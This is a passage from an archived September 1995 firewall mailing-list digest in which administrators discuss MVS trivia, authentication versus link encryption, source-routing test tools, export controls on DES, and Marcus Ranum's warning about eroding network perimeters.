anti-MVS crap, I'd read some newsgroup called: alt.wasted.bandwidth.MVS.vs.anti-MVS Let's face it. for OS in $( wrote: } >> Date: Wed, 13 Sep 1995 10:57:50 -0700 } >> From: janken@rust.net (Kenneth J. Stephens) } >> } >> BCDIC open bracket = hex "4D" or binary "0100 1101" } >> became } >> EBCDIC open paren = hex "4D" or binary "0100 1101" } >> } >> BCDIC close bracket = hex "5D" or binary "0101 1101" } >> became } >> EBCDIC close paren = hex "5D" or binary "0101 1101" } >> } >> So say my green card. } > } >I know it's unofficial, but my dd translates [] to hex ad bd, so there } >is a unique translation even for the brackets. } > } >It's quite a separate question what shows up on the screen of a genuine } >3270 for some of these characters, or what gets printed. } > } >Bigotry in either direction is non-PC :-) } > } >Wonder how many of us still have our green cards (other than resident } >aliens, of course)? I do. } > } >Barney Wolff } > } > } } I still have mine, but it does not explain what the following code does: } } BALR 3,0 } } BALR 3,3 } **** cjolley@iac.net } **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Wed Sep 13 14:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA06012 for firewalls-outgoing; Wed, 13 Sep 1995 13:38:19 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA06003 for ; Wed, 13 Sep 1995 13:38:15 -0700 Received: from pm3-01.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA21430; Wed, 13 Sep 95 15:34:49 -0400 Date: Wed, 13 Sep 95 15:34:49 -0400 Message-Id: <9509131934.AA21430@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Bill Husler From: frankw@in.net (Frank Willoughby) Subject: Re: User Authentication Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was surfing on the net one day and stumbled onto one with a slick user I/F where you can watch the net traffic & just hit a key to take over the session. I'll have to dig up where I saw it (I had to re-install Netscape & lost my bookmarks). 8^( I think the commercial version is available for a couple of hundred dollars. Authentication (even encrypted one-time pad authentication) alone isn't worth much. Strong authentication *plus* solid encryption is what I would recommend to anyone who is serious about protecting their company from the hazards of connecting to the Internet. I would look for fully encrypted links. >From the what-it's-worth department - When I was doing a firewall evaluation a while ago, the only firewall vendor that had a solid authentication/encryption scheme was V-ONE. They had user-friendly fully-encrypted links (user->firewall & firewall->firewall). Virtually transparent to the users too. If I remember right, their number was (301) 838-8900. But, I digress... Best Regards, Frank >>Any hacker worth their salt will let the user long in using strong >>authentication and then take over the session after the user has >>logged in to their system. It is better to rely on user -> firewall >>and/or firewall -> firewall encryption (using strong authentication, >>of course) than to rely on strong authentication only. >> >I've been being told that most companies are piling their resources >(buck) on the authentication and not using traffic encryption because >they feel that session assumptions is really more difficult that one >would be lead to believe and encryption represents considerable overhead. >Any comments? >Thanks, >Bill > >The opinions expressed here-in are my own. Any similarities between these >opinions and those of any other person - living or not - including my >employer are purely coincidental. > > > > From firewalls-owner Wed Sep 13 14:32:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07434 for firewalls-outgoing; Wed, 13 Sep 1995 14:24:55 -0700 Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA07427 for ; Wed, 13 Sep 1995 14:24:51 -0700 Received: from pm3-25.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA23532; Wed, 13 Sep 95 16:22:57 -0400 Date: Wed, 13 Sep 95 16:22:57 -0400 Message-Id: <9509132022.AA23532@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: RE: Xyplex Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dave, My mail to you bounced. Your gateway didn't like the address you supplied. E-mail me & I'll reply. Best Regards, Frank From firewalls-owner Wed Sep 13 14:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA06955 for firewalls-outgoing; Wed, 13 Sep 1995 14:09:27 -0700 Received: from ic.co.at (ic.co.at [193.81.168.69]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA06948 for ; Wed, 13 Sep 1995 14:09:21 -0700 Received: from ic.co.at (ic.co.at [193.80.224.9]) by ic.co.at (8.7.Beta.14/8.7.Beta.14) with SMTP id XAA13481 for ; Wed, 13 Sep 1995 23:11:56 -0100 Date: Wed, 13 Sep 1995 23:11:55 -0100 (GMT-0100) From: Michael Haberler To: firewalls@greatcircle.com Subject: IP source routed traffic - how to generate? In-Reply-To: <11D946E99@lce.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for tools to generate TCP connections or UDP with source routed IP packets for reasonably popular platforms. Any hints? -michael ps: No, I'm not a loonie from alt.2600, I want to quality-check our own work. But then, thats what these guys probably also would say.. Michael Haberler mah@eunet.co.at EUnet Austria Ltd MH182 A-1090 Vienna, Austria, Thurngasse 8/16 Tel: +43 (1) 31376 fax: +43 (1) 3106926 From firewalls-owner Wed Sep 13 14:34:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA06345 for firewalls-outgoing; Wed, 13 Sep 1995 13:47:25 -0700 Received: from kgbvax.network.com (kgbvax.network.com [129.191.202.58]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA06338 for ; Wed, 13 Sep 1995 13:47:21 -0700 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id PAA17393; Wed, 13 Sep 1995 15:43:10 -0400 Date: Wed, 13 Sep 1995 15:43:10 -0400 From: Ted Doty Message-Id: <199509131943.PAA17393@kgbvax.network.com> To: bhusler@community.net, firewalls@greatcircle.com Subject: Re: User Authentication In-Reply-To: Mail from 'Bill Husler ' dated: Wed, 13 Sep 1995 10:01:36 -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bill Husler writes: > I've been being told that most companies are piling their resources > (buck) on the authentication and not using traffic encryption because > they feel that session assumptions is really more difficult that one > would be lead to believe and encryption represents considerable overhead. Any decent PC should be able to run DES much faster than the internet feed can take the bits (not that this is really saying much). DES is well understood, and IPSec clearly defines what is needed. Look for several implementations being interoperability-tested soon. The real problem is the ITAR. If I have to sell my foo-widget IP stack for Windoze for $159, I can't afford to license each copy. However, I can probably implement IPSec with only MD5 and photurus, and sell it shrink- wrapped in Berlin. It's not a technical (or performance) issue. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Wed Sep 13 15:01:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA07067 for firewalls-outgoing; Wed, 13 Sep 1995 14:13:37 -0700 Received: from venera.isi.edu (venera.isi.edu [128.9.0.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA07058 for ; Wed, 13 Sep 1995 14:13:33 -0700 From: bmanning@ISI.EDU Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Wed, 13 Sep 1995 14:12:09 -0700 Posted-Date: Wed, 13 Sep 1995 14:09:16 -0700 (PDT) Message-Id: <199509132109.AA02720@zed.isi.edu> Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Wed, 13 Sep 1995 14:09:16 -0700 Subject: Re: source routing To: R@lce.org Date: Wed, 13 Sep 1995 14:09:16 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: <11D946E99@lce.org> from "R@lce.org" at Sep 13, 95 11:15:24 am X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 996 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Sorry about the changed subject line but I had already deleted a > short thread earlier, someone was asking for a program that could > produce source routed packets to use in testing against a firewall. > While looking around windows 95 I found that traceroute (tracert.exe) > and ping (ping.exe) both claim in their usage blurb to be able to do > loose source routing, ping also claims strict source routing. The > programs aren't in the on-line help and are barely mentioned in the > very thick and so far useless book with the resource kit. My guess is > these came out of windows nt and would presumably be documented > there. Anyone know? > > Ramon > Er, No. PING and traceroute are/were developed for as internet trouble shooting tools and are in the Public Domain. MicroSoft simply ported them, since they are used in wide area networking for support purposes. They are -NOT- microsoft code nor products, other than the work needed to port them to this OS. -- --bill From firewalls-owner Wed Sep 13 15:02:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA08391 for firewalls-outgoing; Wed, 13 Sep 1995 14:56:25 -0700 Received: from flying.fish.com (flying.fish.com [140.174.97.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA08382 for ; Wed, 13 Sep 1995 14:56:21 -0700 Received: (from zen@localhost) by flying.fish.com (8.7.1.3 (Alpha)/8.7.1.3) id OAA21435; Wed, 13 Sep 1995 14:53:43 -0700 Date: Wed, 13 Sep 1995 14:53:43 -0700 From: d Message-Id: <199509132153.OAA21435@flying.fish.com> To: firewalls@greatcircle.com In-reply-to: ufpsprod!gmyers@atlml1.attmail.com's message of 13 Sep 1995 14:04:49 -0700 Subject: Re: MVS religious war, was MVS vs the world Organization: Vicious Fishes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Let's face it. > for OS in $( print $OS people are going to defend $OS operating system.... > done Ahem. Surely you mean: for $OS (keys %list_of_OS) { print "$OS people will defend $list_of_OS{$OS} operating system...\n"; } -- d From firewalls-owner Wed Sep 13 15:24:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA08547 for firewalls-outgoing; Wed, 13 Sep 1995 14:59:30 -0700 Received: from gatekeeper.alcatel.com.au (gatekeeper.alcatel.com.au [203.17.66.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA08540 for ; Wed, 13 Sep 1995 14:59:26 -0700 Received: from 139.188.22.50 (139.188.22.50) by gatekeeper.alcatel.com.au (PMDF V5.0-4 #11861) id <01HV9C0OOS6O0000DU@gatekeeper.alcatel.com.au> for firewalls@greatcircle.com; Thu, 14 Sep 1995 07:56:35 +1000 Received: from gsms01.alcatel.oz.au (gsms01.alcatel.oz.au) by cbd.alcatel.oz.au (PMDF V5.0-3 #9241) id <01HV9C224AOG9OD9YN@cbd.alcatel.oz.au> for firewalls@greatcircle.com; Thu, 14 Sep 1995 07:57:42 +1000 Received: (from jeremyp@localhost) by gsms01.alcatel.oz.au (8.6.12/8.6.12) id HAA07541 for firewalls@greatcircle.com; Thu, 14 Sep 1995 07:57:54 +1000 Date: Thu, 14 Sep 1995 07:57:54 +1000 From: Peter Jeremy Subject: Re: The end of MVS vs the world To: firewalls@greatcircle.com Message-id: <199509132157.HAA07541@gsms01.alcatel.oz.au> Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk J. Eric Townsend writes: >If this doesn't stop soon I'll start reposting parts of "Programming >the Commodore PET", whining about PETSCII and ranting about why >companies won't port their servers to 8 bit micros. We have previously covered how to build a firewall out of a VIC-20. A similar approach would be quite applicable for a PET. In fact, the PET was large enough that you could probably cleanly mount the BNC's through the case, rather than just using electrical tape :-). >That, or I'll go into Amiga-owner persecution complex mode Wonderful machine. M$ are only now implementing some of the features that the Amiga had 10 years ago. > "I could run a firewall on my Amiga if you >bastards would just port your code!" If you have an '030 or better, you can always run Amix, Minix, Linux and at least one of the *BSD's. There's no reason why you couldn't add a TCP/IP stack to AmigaDOS though - create a TCP: device and mount it. You then open TCP:123.123.123.123.25 for SMTP to [123.123.123.123] etc. The AmigaDOS/Exec approach to devices is much cleaner than most other OS's. Note that I don't think that AmigaDOS would make a good base for a firewall because of its lack of process protection. (Who remembers tha PDP-11 MMU discussion in comp.os.minix?) Peter. From firewalls-owner Wed Sep 13 15:30:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA09672 for firewalls-outgoing; Wed, 13 Sep 1995 15:25:12 -0700 Received: from interlock.mckesson.com (interlock.mckesson.com [199.221.43.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA09658 for ; Wed, 13 Sep 1995 15:25:07 -0700 Received: from [128.1.53.158] (billhost.mckesson.com) by interlock.mckesson.com with SMTP id AA08429 (InterLock SMTP Gateway 3.0 for ); Wed, 13 Sep 1995 15:23:14 -0700 Date: Wed, 13 Sep 1995 15:23:14 -0700 Message-Id: <199509132223.AA08429@interlock.mckesson.com> Subject: Re: MVS vs the world From: Bill Husler To: "Barney Wolff" , "Kenneth J. Stephens" , "A. Padgett Peterson, P.E. Information Security" , Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Wonder how many of us still have our green cards (other than resident >aliens, of course)? I do. > >Barney Wolff > I gave up my green card over a decade ago. Of course that was in favor of the yellow book (GX20-1850-5). Bill The opinions expressed here-in are my own. Any similarities between these opinions and those of any other person - living or not - including my employer are purely coincidental. From firewalls-owner Wed Sep 13 16:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA12340 for firewalls-outgoing; Wed, 13 Sep 1995 16:22:09 -0700 Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA12330 for ; Wed, 13 Sep 1995 16:22:06 -0700 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id SAA29883 for GreatCircle.COM!firewalls; Wed, 13 Sep 1995 18:12:11 -0500 Received: by ris1.nmti.com (smail2.5) id AA14210; 13 Sep 95 17:30:39 CDT (Wed) Received: by sonic.nmti.com; id AA09837; Wed, 13 Sep 1995 17:57:13 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9509132257.AA09837@sonic.nmti.com.nmti.com> Subject: Re: Secure version of Sendmail To: smith@sctc.com (Rick Smith) Date: Wed, 13 Sep 1995 17:57:13 -0500 (CDT) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199509131728.MAA20468@shade.sctc.com> from "Rick Smith" at Sep 13, 95 12:28:59 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 338 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The point is, you *can't* guarantee that a large, capable, general > purpose package is bug free, whether the bugs are security oriented or > anything else. So you need something to backstop it, like Type > Enforcement or maybe MLS protections. Of course a class B operating system is itself a large, capable, general purpose package. From firewalls-owner Wed Sep 13 17:30:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA13927 for firewalls-outgoing; Wed, 13 Sep 1995 17:12:29 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA13920 for ; Wed, 13 Sep 1995 17:12:25 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id UAA16397 for firewalls@greatcircle.com; Wed, 13 Sep 1995 20:34:55 -0400 From: "Marcus J. Ranum" Message-Id: <199509140034.UAA16397@switchblade.iwi.com> Subject: Firewall off Mortal Kombat XIV To: firewalls@greatcircle.com Date: Wed, 13 Sep 1995 20:34:55 -0400 (EDT) Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 2506 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >By JONATHAN STANDING >c.1995 Bloomberg Business News > >TOKYO -- Sega Enterprises Ltd. will sell products that allow users of its >Saturn video game player to dial into the Internet network, a feature that >could be the first step toward worldwide interactive video games. [...] I've been wondering when the first DOOM proxies would be implemented, but *THIS* is really something!! Apparently the unit will be available with a modem that will do dial-on-demand IP. The next step that will doubtless occur to some rocket scientist is to have the machines dynamically download pay-per-game code to eliminate those silly ROM cartridges, and then comes the whole billing problem. These kinds of things keep pointing me back to the basic problems I believe we (the security dweebs of the world) are going to face in the next 5 years: 1) The notion of "network perimeter" will erode to the point where saying "protect all access into and out of your network" will be greeted with hysterical giggles. Right now when I say that many of my customers just look at me with a glazed eyed expression as if to say, "pull the other one." 2) IPV6 will not save us. I don't expect that all the new IP-based toaster ovens, Sega machines, and clock radios are going to talk V6. By the time V6 actually exists, the installed base will be too large to replace. To help get your brain around the problem, consider the reaction if someone suggested that the US change over to 220 volt European power grids. 3) The number of new network-aware and IP-aware apps is now on an exponential growth curve. Consider, for a moment, how the typical network app is developed today: Version 1: no security Version 2: security? next version Version 3: something lame With the increase in network-permeation, the actual number of things that "get it right" will be close to zero. 4) I used to worry that the government's myopic views on cryptography were going to keep us from building good high-integrity APIs and tools into our infrastrcture. Now I realize I was naive: it is *TOO* *LATE* to fix it; it has gotten too big. What does this all mean? It may mean that there's good job security in being a computer professional. It may mean that someone is going to look at the situation and announce that we have no clothes. I *HOPE* it means that someone will begin to think of new computer security paradigms. Who knows what they will be? I don't think we're going to win the war the way it's going. mjr. From firewalls-owner Wed Sep 13 18:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA14700 for firewalls-outgoing; Wed, 13 Sep 1995 17:40:15 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA14692 for ; Wed, 13 Sep 1995 17:40:11 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA09453; Wed, 13 Sep 95 19:59:05 CDT Received: by mnbp.network.com with Microsoft Mail id <3057799E@mnbp.network.com>; Wed, 13 Sep 95 19:38:54 CDT From: Craig McLellan To: firewalls Subject: Does anyone do remote monitoring Date: Wed, 13 Sep 95 19:36:00 CDT Message-Id: <3057799E@mnbp.network.com> Encoding: 5 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a customer who is looking for any firms that provide remote security monitoring. Anyone know of this??? RGRDS....clm From firewalls-owner Wed Sep 13 18:02:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA15088 for firewalls-outgoing; Wed, 13 Sep 1995 17:55:31 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA15079 for ; Wed, 13 Sep 1995 17:55:16 -0700 Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA09592; Wed, 13 Sep 95 20:14:04 CDT Received: by mnbp.network.com with Microsoft Mail id <30577D22@mnbp.network.com>; Wed, 13 Sep 95 19:53:54 CDT From: Craig McLellan To: firewalls Subject: RE: Firewall off Mortal Kombat XIV Date: Wed, 13 Sep 95 19:52:00 CDT Message-Id: <30577D22@mnbp.network.com> Encoding: 72 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As far as I know we've been firewalling DOOM since DOOM was released. We could firewall any game off a net. RGRDS....clm Network Systems Corp. Try WWW.NETWORK.COM ---------- ---------------------------------------------------------------------------- -- >By JONATHAN STANDING >c.1995 Bloomberg Business News > >TOKYO -- Sega Enterprises Ltd. will sell products that allow users of its >Saturn video game player to dial into the Internet network, a feature that >could be the first step toward worldwide interactive video games. [...] I've been wondering when the first DOOM proxies would be implemented, but *THIS* is really something!! Apparently the unit will be available with a modem that will do dial-on-demand IP. The next step that will doubtless occur to some rocket scientist is to have the machines dynamically download pay-per-game code to eliminate those silly ROM cartridges, and then comes the whole billing problem. These kinds of things keep pointing me back to the basic problems I believe we (the security dweebs of the world) are going to face in the next 5 years: 1) The notion of "network perimeter" will erode to the point where saying "protect all access into and out of your network" will be greeted with hysterical giggles. Right now when I say that many of my customers just look at me with a glazed eyed expression as if to say, "pull the other one." 2) IPV6 will not save us. I don't expect that all the new IP-based toaster ovens, Sega machines, and clock radios are going to talk V6. By the time V6 actually exists, the installed base will be too large to replace. To help get your brain around the problem, consider the reaction if someone suggested that the US change over to 220 volt European power grids. 3) The number of new network-aware and IP-aware apps is now on an exponential growth curve. Consider, for a moment, how the typical network app is developed today: Version 1: no security Version 2: security? next version Version 3: something lame With the increase in network-permeation, the actual number of things that "get it right" will be close to zero. 4) I used to worry that the government's myopic views on cryptography were going to keep us from building good high-integrity APIs and tools into our infrastrcture. Now I realize I was naive: it is *TOO* *LATE* to fix it; it has gotten too big. What does this all mean? It may mean that there's good job security in being a computer professional. It may mean that someone is going to look at the situation and announce that we have no clothes. I *HOPE* it means that someone will begin to think of new computer security paradigms. Who knows what they will be? I don't think we're going to win the war the way it's going. mjr. From firewalls-owner Wed Sep 13 18:30:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA15642 for firewalls-outgoing; Wed, 13 Sep 1995 18:13:45 -0700 Received: from upgrade.com (upgrade.com [199.174.17.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA15630 for ; Wed, 13 Sep 1995 18:13:40 -0700 Received: from upgrade.com ([127.0.0.1]) by upgrade.com (8.6.12/8.6.12) with ESMTP id VAA14094; Wed, 13 Sep 1995 21:11:07 -0400 Message-Id: <199509140111.VAA14094@upgrade.com> To: mjr@iwi.com cc: firewalls@GreatCircle.COM Subject: Re: Firewall off Mortal Kombat XIV In-reply-to: Your message of "Wed, 13 Sep 1995 20:34:55 EDT." <199509140034.UAA16397@switchblade.iwi.com> Date: Wed, 13 Sep 1995 21:11:06 -0400 From: Christopher Nielsen Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 1995 20:34:55 -0400 (EDT) "Marcus J. Ranum" wrote: -------- [snip] >> 3) The number of new network-aware and IP-aware apps is >> now on an exponential growth curve. Consider, for a moment, >> how the typical network app is developed today: >> Version 1: no security >> Version 2: security? next version >> Version 3: something lame >> With the increase in network-permeation, the actual number >> of things that "get it right" will be close to zero. I see this with the developers at my place of employment. They write network apps that have to run as root because they've hardwired it that way. The apps have all kinds of neat bells and whistles, but contain some very basic but serious security bugs. I've tried to put together a list of secure programming guidelines because I don't have time to verify all the code that these guys produce, but that seems to me to be only a kludge. I have numerous stories of confrontations with security-clueless developers and managers, but I'm sure we all have those. =) >> What does this all mean? It may mean that there's good >> job security in being a computer professional. It may mean that >> someone is going to look at the situation and announce that we >> have no clothes. I *HOPE* it means that someone will begin to >> think of new computer security paradigms. Who knows what they >> will be? I don't think we're going to win the war the way it's >> going. As it stands, it seems to me that we are barely keeping ahead of the security game. I definitely agree that we won't win the war if we keep this up. People need to wake up to the facts, but it seems to take a disaster or crisis before they do so. It can be very frustrating when people won't listen to you because they think they're right; I had that problem with one of the CIOs yesterday. My present solution is to just do my job and don't give up the fight. Even if that means beating my head against the management wall until my forehead bleeds. -Chris =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Christopher Nielsen UCA&L System and Network Administrator Buffalo, New York (nielsenc@upgrade.com) #include From firewalls-owner Wed Sep 13 19:32:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA17491 for firewalls-outgoing; Wed, 13 Sep 1995 19:16:11 -0700 Received: from westie.mid.net (ns1.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA17483 for ; Wed, 13 Sep 1995 19:16:08 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id VAA15329; Wed, 13 Sep 1995 21:14:49 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id VAA18437; Wed, 13 Sep 1995 21:14:52 -0500 From: Alan Hannan Message-Id: <199509140214.VAA18437@gaijin.mid.net> Subject: Re: Does anyone do remote monitoring To: mclelcl@onto.network.com (Craig McLellan) Date: Wed, 13 Sep 1995 21:14:52 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <3057799E@mnbp.network.com> from "Craig McLellan" at Sep 13, 95 07:36:00 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 624 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Craig McLellan is rumored to have said: ] ] ] I have a customer who is looking for any firms that provide remote security ] monitoring. Anyone know of this??? Sometime ago, BBN planet announced a product that sounds very similar to what you are speaking of. As well, MIDnet offers firewall monitoring with our SecurIt firewall as a value-added service. -- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 "The only way to make a man trustworthy is to trust him" - Henry Stimson From firewalls-owner Wed Sep 13 19:36:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA17455 for firewalls-outgoing; Wed, 13 Sep 1995 19:14:58 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA17447 for ; Wed, 13 Sep 1995 19:14:53 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id VAA15320; Wed, 13 Sep 1995 21:13:36 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id VAA18427; Wed, 13 Sep 1995 21:13:39 -0500 From: Alan Hannan Message-Id: <199509140213.VAA18427@gaijin.mid.net> Subject: Re: Firewall off Mortal Kombat XIV To: mjr@iwi.com Date: Wed, 13 Sep 1995 21:13:38 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509140034.UAA16397@switchblade.iwi.com> from "Marcus J. Ranum" at Sep 13, 95 08:34:55 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 5990 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk wire> By JONATHAN STANDING wire> c.1995 Bloomberg Business News wire> wire> TOKYO -- Sega Enterprises Ltd. will sell products that allow users of its wire> Saturn video game player to dial into the Internet network, a feature that wire> could be the first step toward worldwide interactive video games. mjr> implemented, but *THIS* is really something!! Apparently the unit mjr> will be available with a modem that will do dial-on-demand IP. mjr> The next step that will doubtless occur to some rocket scientist mjr> is to have the machines dynamically download pay-per-game code mjr> to eliminate those silly ROM cartridges, and then comes the whole mjr> billing problem. This is already done with the Sega channel, no? Only the medium is different. My, I wish I had time to experiment with this sort of thing.. ;) Speaking of billing problems, anyone read your comp.protocols.tcp-ip.domains lately? mjr> 1) The notion of "network perimeter" will erode to the point mjr> where saying "protect all access into and out of your network" mjr> will be greeted with hysterical giggles. Right now when I mjr> say that many of my customers just look at me with a glazed mjr> eyed expression as if to say, "pull the other one." I believe a larger issue here is the responsibility of the company or employer to provide access for the workforce to the internet. While many of my customers insist on unfettered and unbreakable security being delivered (which is, of course, undeliverable at this time), a majority understand that the security-convenience tradeoff is significant. Therefore, their users make do without promiscuous access, as the funding party [who happens to be the employer] makes the rules. My point, I don't see that as prevelant, though it does happen. As well, why does the employer owe them this access? Often the management adopts a mature approach, and while they know they must "trade", they know they don't have to "surf". mjr> 2) IPV6 will not save us. I don't expect that all the new mjr> IP-based toaster ovens, Sega machines, and clock radios mjr> are going to talk V6. By the time V6 actually exists, the mjr> installed base will be too large to replace. To help get mjr> your brain around the problem, consider the reaction if mjr> someone suggested that the US change over to 220 volt mjr> European power grids. Imagine Hannan-Ranum Enterprises Inc. develops a $400 gadget that allows one's home to carry both 110 and 220 volt power, regardless of the source from the power company. This allows people to migrate to the new toasters which use 220 volt power. Also, we develop a $300 gadget that, when affixed to transformers, allows them to carry both 110 and 220 volt current without the potential problems. Now we have a supply side (power grid / Internet) duality, as well as a demand side (homes / internal network) duality that allows us to continue our exponential growth more comfortably. This is where the ipV6 and downwards compatible routers could take us. mjr> 3) The number of new network-aware and IP-aware apps is mjr> now on an exponential growth curve. Consider, for a moment, mjr> how the typical network app is developed today: mjr> Version 1: no security mjr> Version 2: security? next version mjr> Version 3: something lame mjr> With the increase in network-permeation, the actual number mjr> of things that "get it right" will be close to zero. Perhaps, but the wonderful tools you've developed allow one to coexist with these silly applications. I mean that sincerely. The ease of transition for networks using transparent proxies is, in my opinion, a *Very Good Thing* (tm). As well, the security imparted to the internal network is at least that of the preceding, non-transparent proxy firewall. mjr> 4) I used to worry that the government's myopic views mjr> on cryptography were going to keep us from building good mjr> high-integrity APIs and tools into our infrastrcture. mjr> Now I realize I was naive: it is *TOO* *LATE* to fix it; mjr> it has gotten too big. I don't follow you. Do you mean to imply that there are too many installed base apps that to hope to consolidate them into a securely communicating network is impossible? That the current network and install cost are too great to contemplate? You said it yourself, the systems are growing exponentially, there will never be as few as there are now. This reminds me of the decision of the mid-80's to maintain backwards compatibility for 8086 in all 80x86, on the basis that there was too large of an installed base. mjr> What 